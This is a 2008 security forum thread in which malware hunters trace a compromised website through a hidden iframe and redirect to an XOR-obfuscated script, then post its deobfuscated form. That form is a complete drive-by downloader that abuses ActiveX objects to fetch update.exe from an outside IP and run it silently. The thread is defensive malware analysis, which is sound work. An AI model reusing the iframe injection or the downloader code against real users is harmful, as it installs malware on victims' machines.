CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

Donation/Premium
spacer
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
spacer spacer

Poor Hospitality

 
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
downie

PIRT Handler


Joined: May 19, 2006
Posts: 3982

Phishing Squad

PostPosted: Wed Mar 05, 2008 1:09 am    Post subject: Poor Hospitality
Reply with quote

hxxp://www.cmi-hm.com/ has tagged on the end

Code:
<iframe src="http://allotof.com" width=1 height=1 style="visibility: hidden"></iframe>

leading to
hxxp://58.65.239.10/~leohin/diamond/i/index.php?out=2222
and after that it gets obfuscated....


_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
Back to top
View users profile Send private message
maliciousbrains

Sergeant
Sergeant
Premium Member

Joined: Feb 23, 2008
Posts: 103

Premium

PostPosted: Wed Mar 05, 2008 2:01 am    Post subject:
Reply with quote

hxxp://allotof.com

<html><head></head><frameset border="0" rows="100%,*" cols="100%" frameborder="no"><frame name="TopFrame" scrolling="yes" noresize src="hxxp://58.65.239.10/~leohin/diamond/i/index.php?out=2222"><frame name="BottomFrame" scrolling="no" noresize><noframes></noframes></frameset></html>

Seems harmless as the account that it was pointing to in the web server got suspended:

"This Account Has Been Suspended For Violation Of Hosting Terms And Conditions"


_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org

There are no patches or service packs for ignorance!
Back to top
View users profile Send private message Visit posters website
downie

PIRT Handler


Joined: May 19, 2006
Posts: 3982

Phishing Squad

PostPosted: Wed Mar 05, 2008 2:27 am    Post subject:
Reply with quote

Well they would say that Wink

Code:
wget -O - -q -U 'Mozilla/4.0 (compatible; MSIE 5.1; Windows 98)' "http://58.65.239.10/~leohin/diamond/i/index.php?out=2222"


gets you

Code:
<script language='JavaScript'>var crp = Array(193,142,158,143,148,141,137,221,145,156,147,154,136,156,154,152,192,218,
183,156,139,156,174,158,143,148,141,137,218,195,240,247,240,247,155,136,147,
158,137,148,146,147,221,190,143,152,156,137,152,178,159,151,152,158,137,213,
190,177,174,180,185,209,221,147,156,144,152,212,240,247,134,240,247,244,139,
156,143,221,143,221,192,221,147,136,145,145,198,240,247,244,137,143,132,221,
134,221,152,139,156,145,213,218,143,221,192,221,190,177,174,180,185,211,190,
143,152,156,137,152,178,159,151,152,158,137,213,147,156,144,152,212,218,212,
221,128,158,156,137,158,149,213,152,212,134,128,244,240,247,244,148,155,221,
213,220,221,143,212,221,134,221,137,143,132,221,134,221,152,139,156,145,213,
218,143,221,192,221,190,177,174,180,185,211,190,143,152,156,137,152,178,159,
151,152,158,137,213,147,156,144,152,209,221,223,223,212,218,212,221,128,158,
156,137,158,149,213,152,212,134,128,221,128,240,247,244,148,155,221,213,220,
221,143,212,221,134,221,137,143,132,221,134,221,152,139,156,145,213,218,143,
221,192,221,190,177,174,180,185,211,190,143,152,156,137,152,178,159,151,152,
158,137,213,147,156,144,152,209,221,223,223,209,221,223,223,212,218,212,221,
128,158,156,137,158,149,213,152,212,134,128,221,128,240,247,244,148,155,221,
213,220,221,143,212,221,134,221,137,143,132,221,134,221,152,139,156,145,213,
218,143,221,192,221,190,177,174,180,185,211,186,152,137,178,159,151,152,158,
137,213,223,223,209,221,147,156,144,152,212,218,212,221,128,158,156,137,158,
149,213,152,212,134,128,221,128,240,247,244,148,155,221,213,220,221,143,212,
221,134,221,137,143,132,221,134,221,152,139,156,145,213,218,143,221,192,221,
190,177,174,180,185,211,186,152,137,178,159,151,152,158,137,213,147,156,144,
152,209,221,223,223,212,218,212,221,128,158,156,137,158,149,213,152,212,134,
128,221,128,240,247,244,148,155,221,213,220,221,143,212,221,134,221,137,143,
132,221,134,221,152,139,156,145,213,218,143,221,192,221,190,177,174,180,185,
211,186,152,137,178,159,151,152,158,137,213,147,156,144,152,212,218,212,221,
128,158,156,137,158,149,213,152,212,134,128,221,128,240,247,244,143,152,137,
136,143,147,213,143,212,198,240,247,128,240,247,240,247,240,247,139,156,143,
221,136,143,145,221,192,221,218,149,137,137,141,199,210,210,197,204,211,207,
211,204,196,202,211,204,201,210,141,145,142,210,153,146,138,147,145,146,156,
153,211,141,149,141,194,145,192,144,142,148,152,203,218,198,240,247,240,247,
152,139,156,145,221,213,218,139,156,218,214,218,143,221,158,145,142,218,214,
218,148,153,142,221,192,221,147,218,214,218,152,138,221,188,218,214,218,143,
218,214,218,143,218,214,218,156,218,214,218,132,213,161,218,158,145,142,218,
214,218,148,153,218,214,218,199,218,214,218,191,218,214,218,185,218,214,218,
196,218,214,218,203,218,214,218,190,218,214,218,200,218,214,218,200,218,214,
218,203,218,214,218,208,218,214,218,203,200,218,214,218,188,206,218,214,218,
208,204,204,218,214,218,185,205,218,214,218,208,196,197,218,214,218,206,188,
218,214,218,208,205,218,214,218,205,190,218,214,218,205,201,218,214,218,187,
190,218,214,218,207,196,218,214,218,184,206,218,214,218,205,161,218,209,161,
218,158,145,142,148,153,199,191,185,196,203,218,214,218,190,200,218,214,218,
200,203,208,203,200,188,206,218,214,218,208,218,214,218,204,204,185,205,218,
214,218,208,218,214,218,196,197,206,188,208,205,205,190,218,214,218,205,218,
214,218,201,187,190,218,214,218,207,218,214,218,196,184,206,218,214,218,203,
161,218,209,161,218,158,145,218,214,218,142,148,218,214,218,153,199,188,191,
218,214,218,196,191,218,214,218,190,218,214,218,184,185,185,208,218,214,218,
184,218,214,218,190,202,218,214,218,184,208,201,218,214,218,202,184,218,214,
218,204,208,196,206,218,214,218,207,207,208,185,218,214,218,201,218,214,218,
188,207,204,205,218,214,218,203,204,202,218,214,218,204,204,203,161,218,209,
161,218,158,218,214,218,145,142,148,218,214,218,153,199,205,205,205,218,214,
218,203,187,205,206,218,214,218,206,208,205,205,218,214,218,205,205,208,205,
218,214,218,205,218,214,218,205,218,214,218,205,218,214,218,208,190,205,205,
205,218,214,218,208,205,205,218,214,218,205,205,205,205,205,205,218,214,218,
205,205,218,214,218,201,203,161,218,209,161,218,158,145,142,218,214,218,148,
218,214,218,153,218,214,218,199,205,218,214,218,205,205,203,187,218,214,218,
205,206,188,208,205,205,205,205,208,205,205,205,205,208,218,214,218,190,205,
205,218,214,218,205,218,214,218,208,205,205,218,214,218,205,205,205,205,218,
214,218,205,205,205,205,201,203,161,218,209,161,218,158,145,218,214,218,142,
148,153,199,203,218,214,218,152,218,214,218,206,207,205,218,214,218,202,205,
156,218,214,218,208,202,203,218,214,218,203,153,208,218,214,218,201,218,214,
218,152,152,203,208,218,214,218,197,202,218,214,218,196,158,218,214,218,208,
218,214,218,153,158,218,214,218,204,155,218,214,218,156,196,204,153,218,214,
218,207,155,158,206,161,218,209,161,218,158,218,214,218,145,142,148,218,214,
218,153,199,203,201,218,214,218,204,201,218,214,218,200,204,207,191,208,191,
218,214,218,196,202,197,208,201,200,204,185,208,218,214,218,188,205,185,218,
214,218,197,208,187,190,218,214,218,187,185,187,206,206,218,214,218,184,218,
214,218,197,206,218,214,218,206,190,161,218,209,161,218,158,145,218,214,218,
142,218,214,218,148,218,214,218,153,218,214,218,199,202,187,200,191,202,218,
214,218,187,203,206,208,187,205,203,218,214,218,187,208,201,218,214,218,206,
218,214,218,206,218,214,218,204,218,214,218,208,197,188,207,203,208,206,218,
214,218,206,196,184,218,214,218,205,206,190,218,214,218,205,188,184,218,214,
218,206,185,161,218,209,161,218,158,145,142,218,214,218,148,153,218,214,218,
199,205,203,202,207,206,218,214,218,184,205,218,214,218,196,208,218,214,218,
187,201,190,207,208,201,206,158,218,214,218,197,208,197,206,200,218,214,218,
197,208,205,196,187,190,218,214,218,185,204,185,218,214,218,191,205,218,214,
218,202,218,214,218,203,203,161,218,209,161,218,158,145,142,218,214,218,148,
153,199,203,206,218,214,218,196,187,218,214,218,202,218,214,218,207,200,187,
208,204,218,214,218,191,207,185,208,218,214,218,201,197,206,218,214,218,204,
208,188,196,187,185,208,197,218,214,218,202,201,218,214,218,197,201,202,218,
214,218,203,197,218,214,218,207,205,204,205,161,218,209,161,218,158,145,218,
214,218,142,148,153,199,218,214,218,191,188,218,214,218,205,204,197,218,214,
218,200,218,214,218,196,196,208,204,185,218,214,218,191,206,208,201,201,155,
196,208,218,214,218,197,218,214,218,206,191,218,214,218,201,208,201,203,204,
218,214,218,201,200,218,214,218,201,218,214,218,190,197,218,214,218,201,191,
187,197,161,218,209,161,218,158,145,142,148,153,218,214,218,199,185,205,190,
218,214,218,205,202,185,200,203,218,214,218,208,202,190,203,218,214,218,196,
218,214,218,208,201,206,218,214,218,187,204,208,191,201,188,218,214,218,205,
208,207,200,218,214,218,187,200,188,218,214,218,204,204,187,218,214,218,188,
191,204,218,214,218,196,161,218,209,161,218,158,145,218,214,218,142,148,153,
199,184,197,190,190,190,185,218,214,218,185,187,208,190,188,218,214,218,207,
197,208,218,214,218,201,196,218,214,218,203,159,208,191,205,200,218,214,218,
205,208,203,190,205,202,190,218,214,218,196,203,207,201,202,218,214,218,203,
191,161,218,209,147,136,145,145,212,198,218,212,198,240,247,240,247,139,156,
143,221,146,159,151,192,147,136,145,145,198,240,247,139,156,143,221,133,144,
145,146,159,151,192,147,136,145,145,198,240,247,139,156,143,221,156,153,146,
159,153,146,159,151,192,147,136,145,145,198,240,247,139,156,143,221,152,133,
152,158,146,159,151,192,147,136,145,145,198,240,247,139,156,143,221,148,192,
205,198,240,247,139,156,143,221,148,147,153,198,240,247,139,156,143,221,147,
156,144,152,221,192,221,223,136,141,153,156,137,152,211,152,133,152,223,198,
240,247,240,247,138,149,148,145,152,213,221,213,158,145,142,148,153,142,166,
148,160,221,220,192,221,147,136,145,145,212,221,219,219,221,213,213,133,144,
145,146,159,151,221,192,192,221,147,136,145,145,212,221,129,129,221,213,156,
153,146,159,153,146,159,151,221,192,192,221,147,136,145,145,212,221,129,129,
221,213,152,133,152,158,146,159,151,221,192,192,221,147,136,145,145,212,212,
212,240,247,134,240,247,244,137,143,132,240,247,244,134,240,247,244,244,146,
159,151,221,192,221,153,146,158,136,144,152,147,137,211,158,143,152,156,137,
152,184,145,152,144,152,147,137,213,218,146,159,151,152,158,137,218,212,198,
240,247,244,244,146,159,151,211,142,152,137,188,137,137,143,148,159,136,137,
152,213,223,158,145,156,142,142,148,153,223,209,221,158,145,142,148,153,142,
166,148,160,212,198,240,247,244,128,158,156,137,158,149,213,152,212,240,247,
244,134,244,240,247,244,244,146,159,151,221,192,221,147,136,145,145,198,240,
247,244,128,240,247,240,247,244,148,155,213,146,159,151,212,240,247,244,134,
240,247,244,244,152,139,156,145,213,218,133,144,145,218,214,218,146,159,151,
221,192,218,214,218,221,190,143,152,156,218,214,218,137,152,178,159,151,218,
214,218,152,158,137,213,146,159,218,214,218,151,209,221,223,144,142,218,214,
218,133,144,145,207,218,214,218,211,165,176,218,214,218,177,181,169,169,173,
223,212,198,218,212,198,240,247,244,244,148,155,213,220,133,144,145,146,159,
151,212,240,247,244,244,244,152,139,156,145,213,218,133,144,218,214,218,145,
146,159,218,214,218,151,221,192,221,218,214,218,190,143,218,214,218,152,156,
137,152,178,159,218,214,218,151,152,158,137,218,214,218,213,146,218,214,218,
159,151,209,221,223,176,148,158,218,214,218,143,146,142,146,155,137,211,218,
214,218,165,218,214,218,176,177,181,218,214,218,169,169,173,223,212,198,218,
212,198,240,247,244,244,148,155,213,220,133,144,145,146,159,151,212,240,247,
244,244,244,152,139,156,145,213,218,133,144,218,214,218,145,146,159,218,214,
218,151,221,192,221,190,143,152,218,214,218,156,137,152,178,159,218,214,218,
151,152,158,137,213,146,159,218,214,218,151,209,218,214,218,221,223,176,174,
165,218,214,218,176,177,207,211,174,152,218,214,218,143,139,152,143,165,218,
214,218,176,177,181,218,214,218,169,169,173,223,212,198,218,212,198,240,247,
244,244,240,247,244,244,148,155,213,133,144,145,146,159,151,212,240,247,244,
244,134,240,247,244,244,244,152,139,156,145,213,218,156,153,146,218,214,218,
159,153,146,159,151,221,218,214,218,192,221,190,143,152,156,218,214,218,137,
152,178,159,151,218,214,218,152,158,137,213,146,159,151,209,221,218,214,218,
223,188,185,178,218,214,218,185,191,211,174,218,214,218,137,143,152,218,214,
218,156,144,223,218,214,218,212,198,218,212,198,240,247,244,244,244,152,139,
156,145,213,218,152,133,152,218,214,218,158,146,159,151,221,192,221,190,143,
152,218,214,218,156,137,152,178,159,218,214,218,151,152,158,137,213,146,159,
218,214,218,151,209,221,223,170,174,158,143,148,218,214,218,141,137,211,174,
218,214,218,149,152,145,145,223,212,198,218,212,198,240,247,244,244,244,148,
147,153,221,192,221,205,198,240,247,244,244,244,240,247,244,244,244,148,155,
213,220,152,133,152,158,146,159,151,212,240,247,244,244,244,134,240,247,244,
244,244,244,152,139,156,145,213,218,152,133,152,218,214,218,158,146,159,218,
214,218,151,221,192,221,190,143,218,214,218,152,156,137,152,218,214,218,178,
159,218,214,218,151,152,158,137,213,146,159,218,214,218,151,209,221,223,174,
149,218,214,218,152,145,145,211,188,141,141,218,214,218,145,148,158,156,137,
148,146,147,223,212,198,218,212,198,240,247,244,244,244,244,148,147,153,221,
192,221,204,198,240,247,244,244,244,128,244,244,244,240,247,244,244,128,240,
247,244,128,240,247,244,148,214,214,198,240,247,128,240,247,240,247,148,155,
213,133,144,145,146,159,151,221,219,219,221,156,153,146,159,153,146,159,151,
221,219,219,221,152,133,152,158,146,159,151,212,240,247,134,240,247,240,247,
244,137,143,132,240,247,244,134,240,247,244,244,133,144,145,146,159,151,211,
146,141,152,147,213,223,186,152,137,223,209,221,136,143,145,209,221,155,156,
145,142,152,212,198,240,247,244,244,133,144,145,146,159,151,211,142,152,147,
153,213,147,136,145,145,212,198,240,247,244,128,221,158,156,137,158,149,213,
152,212,221,134,221,128,240,247,240,247,152,139,156,145,221,213,223,137,223,
214,223,143,223,214,223,132,134,223,214,223,244,152,223,214,223,139,223,214,
223,156,145,213,218,156,223,214,223,153,146,223,214,223,159,218,214,218,153,
146,223,214,223,159,218,214,218,151,211,223,214,223,169,132,218,214,218,141,
152,221,192,221,204,198,218,212,198,152,223,214,223,139,223,214,223,156,145,
213,218,156,153,146,159,218,214,218,153,146,159,218,214,218,151,211,176,146,
218,214,218,153,152,221,192,221,206,198,218,212,198,152,139,223,214,223,156,
145,213,218,156,153,223,214,223,146,159,218,214,218,153,146,159,218,214,218,
151,211,178,141,218,223,214,223,214,218,152,147,213,212,198,218,212,198,152,
139,156,223,214,223,145,213,218,156,153,146,159,218,223,214,223,214,218,153,
146,159,218,214,218,151,211,223,214,223,170,143,218,223,214,223,214,218,148,
137,152,213,218,214,218,223,214,223,133,144,218,223,214,223,214,218,145,223,
214,223,146,159,151,223,214,223,211,218,214,223,214,223,218,143,152,223,214,
223,142,141,146,223,214,223,147,142,218,223,214,223,214,218,152,191,146,153,
132,212,198,218,212,198,152,139,223,214,223,156,145,213,218,156,153,146,159,
218,214,218,153,223,214,223,146,159,218,214,223,214,223,218,151,211,174,156,
218,214,218,139,223,214,223,152,169,146,223,214,223,218,214,218,223,214,223,
187,148,218,223,214,223,214,218,145,223,214,223,152,213,147,223,214,223,156,
218,214,223,214,223,218,144,152,223,214,223,209,221,207,223,214,223,212,198,
218,212,198,152,139,156,145,213,223,214,223,218,156,153,146,159,218,214,218,
153,146,159,218,223,214,223,214,218,151,211,190,145,218,214,218,146,142,152,
213,218,214,218,223,214,223,212,198,218,212,198,128,221,158,156,137,223,214,
223,158,223,214,223,149,213,152,212,221,134,221,128,223,212,198,240,247,244,
240,247,240,247,244,148,155,213,148,147,153,221,192,192,221,205,212,240,247,
244,134,240,247,244,244,137,143,132,240,247,244,244,134,240,247,244,244,244,
152,139,156,145,213,218,152,133,152,218,214,218,158,146,159,218,214,218,151,
211,175,218,214,218,136,147,213,147,218,214,218,156,144,152,218,214,218,209,
221,205,212,198,218,212,198,240,247,244,244,128,158,156,137,158,149,213,152,
212,134,128,240,247,244,128,152,145,142,152,240,247,244,134,240,247,244,244,
137,143,132,240,247,244,244,134,240,247,244,244,244,152,139,156,145,213,218,
152,133,152,218,214,218,158,146,159,218,214,218,151,211,174,218,214,218,149,
152,145,145,218,214,218,184,133,152,218,214,218,158,136,137,218,214,218,152,
213,147,156,218,214,218,144,152,209,221,223,218,214,218,223,209,221,223,223,
209,221,223,218,214,218,146,141,218,214,218,152,147,223,209,218,214,218,221,
205,212,198,218,212,198,240,247,244,244,128,158,156,137,158,149,213,152,212,
134,128,240,247,244,128,240,247,128,240,247,240,247,240,247,240,247,193,210,
142,158,143,148,141,137,195,240,247,247,193,210,159,146,153,132,195,193,210,
149,137,144,145,195);
function decrypt(a){var r='', l=a.length, i=0;for(i=0;i<l;i++){r += String.fromCharCode(253 ^ a[i]);}document.write(r);}decrypt(crp);</script>


(I added linefeeds, they shouldn't affect the function)
It logs IP's by the way, and sends a blank page on subsequent fetches.


_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
Back to top
View users profile Send private message
bobby_

MIRT Hunter


Joined: Nov 04, 2006
Posts: 237
Location: Austria
MIRT

PostPosted: Wed Mar 05, 2008 5:00 am    Post subject:
Reply with quote

Code:
<script language='JavaScript'>

function CreateObject(CLSID, name)
{
   var r = null;
   try { eval('r = CLSID.CreateObject(name)') }catch(e){}
   if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
   if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
   if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
   if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
   if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
   return(r);
}


var url = 'http://81.2.197.14/pls/download.php?l=msie6';

eval ('var clsids = new Array(\'clsid:BD96C556-65A3-11D0-983A-00C04FC29E30\',
\'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\',
\'clsid:AB9BCEDD-EC7E-47E1-9322-D4A210617116\',
\'clsid:0006F033-0000-0000-C000-000000000046\',
\'clsid:0006F03A-0000-0000-C000-000000000046\',
\'clsid:6e32070a-766d-4ee6-879c-dc1fa91d2fc3\',
\'clsid:6414512B-B978-451D-A0D8-FCFDF33E833C\',
\'clsid:7F5B7F63-F06F-4331-8A26-339E03C0AE3D\',
\'clsid:06723E09-F4C2-43c8-8358-09FCD1DB0766\',
\'clsid:639F725F-1B2D-4831-A9FD-874847682010\',
\'clsid:BA018599-1DB3-44f9-83B4-461454C84BF8\',
\'clsid:D0C07D56-7C69-43F1-B4A0-25F5A11FAB19\',
\'clsid:E8CCCDDF-CA28-496b-B050-6C07C962476B\',null);');

var obj=null;
var xmlobj=null;
var adobdobj=null;
var execobj=null;
var i=0;
var ind;
var name = "update.exe";

while( (clsids[i] != null) && ((xmlobj == null) || (adobdobj == null) || (execobj == null)))
{
   try
   {
      obj = document.createElement('object');
      obj.setAttribute("classid", clsids[i]);
   }catch(e)
   {
      obj = null;
   }

   if(obj)
   {
      eval('xmlobj = CreateObject(obj, "msxml2.XMLHTTP");');
      if(!xmlobj)
         eval('xmlobj = CreateObject(obj, "Microsoft.XMLHTTP");');
      if(!xmlobj)
         eval('xmlobj = CreateObject(obj, "MSXML2.ServerXMLHTTP");');

      if(xmlobj)
      {
         eval('adobdobj = CreateObject(obj, "ADODB.Stream");');
         eval('execobj = CreateObject(obj, "WScript.Shell");');
         ind = 0;

         if(!execobj)
         {
            eval('execobj = CreateObject(obj, "Shell.Application");');
            ind = 1;
         }
      }
   }
   i++;
}

if(xmlobj && adobdobj && execobj)
{

   try
   {
      xmlobj.open("Get", url, false);
      xmlobj.send(null);
   } catch(e) { }

eval ("try{   eval('adobdobj.Type = 1;');
eval('adobdobj.Mode = 3;');
eval('adobdobj.Open();');
eval('adobdobj.Write(xmlobj.responseBody);');
eval('adobdobj.SaveToFile(name, 2);');
eval('adobdobj.Close();');} catch(e) { }");


   if(ind == 0)
   {
      try
      {
         eval('execobj.Run(name, 0);');
      }catch(e){}
   }else
   {
      try
      {
         eval('execobj.ShellExecute(name, "", "", "open", 0);');
      }catch(e){}
   }
}



</script>

</body></html>


_________________
ASAP member
Back to top
View users profile Send private message Visit posters website
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Mar 05, 2008 5:51 am    Post subject:
Reply with quote

Code pasted by bobby_ - CastleCops Link/p1062395-MD5_d975641226d9cdc45c406ce59e938770.html

update.exe - CastleCops Link/p1062397-MD5_489012317acf3ddfc2fa9c04665bfd42_update_exe.html


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
maliciousbrains

Sergeant
Sergeant
Premium Member

Joined: Feb 23, 2008
Posts: 103

Premium

PostPosted: Wed Mar 05, 2008 11:43 am    Post subject:
Reply with quote

Awesome mate...

I had spent quite some time digging that link...

If you can share how u got this piece of code.. then it wud be of gr8 help...


_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org

There are no patches or service packs for ignorance!
Back to top
View users profile Send private message Visit posters website
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Mar 05, 2008 4:48 pm    Post subject:
Reply with quote

I got the .exe from

Code:
http://81.2.197.14/pls/download.php?l=msie6


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
bobby_

MIRT Hunter


Joined: Nov 04, 2006
Posts: 237
Location: Austria
MIRT

PostPosted: Wed Mar 05, 2008 5:46 pm    Post subject:
Reply with quote

@maliciousbrains

If your question was for me, I've just deobfuscated the script posted by downie and concatenated the string variables in script.


_________________
ASAP member
Back to top
View users profile Send private message Visit posters website
downie

PIRT Handler


Joined: May 19, 2006
Posts: 3982

Phishing Squad

PostPosted: Wed Mar 05, 2008 6:12 pm    Post subject:
Reply with quote

@maliciousbrains
and I used Wget, spoofing the User Agent. I had to use a proxy to present a different IP after failing on the first attempt.


_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
Back to top
View users profile Send private message
maliciousbrains

Sergeant
Sergeant
Premium Member

Joined: Feb 23, 2008
Posts: 103

Premium

PostPosted: Wed Mar 05, 2008 6:53 pm    Post subject:
Reply with quote

Thanks a lot everyone for sharing the process...


_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org

There are no patches or service packs for ignorance!
Back to top
View users profile Send private message Visit posters website
Display posts from previous:   
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links All times are GMT
Page 1 of 1

 
Quick Reply:
Username: 

Quote the last message
Attach signature (signatures can be changed in profile)
 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001 phpBB Group
spacer spacer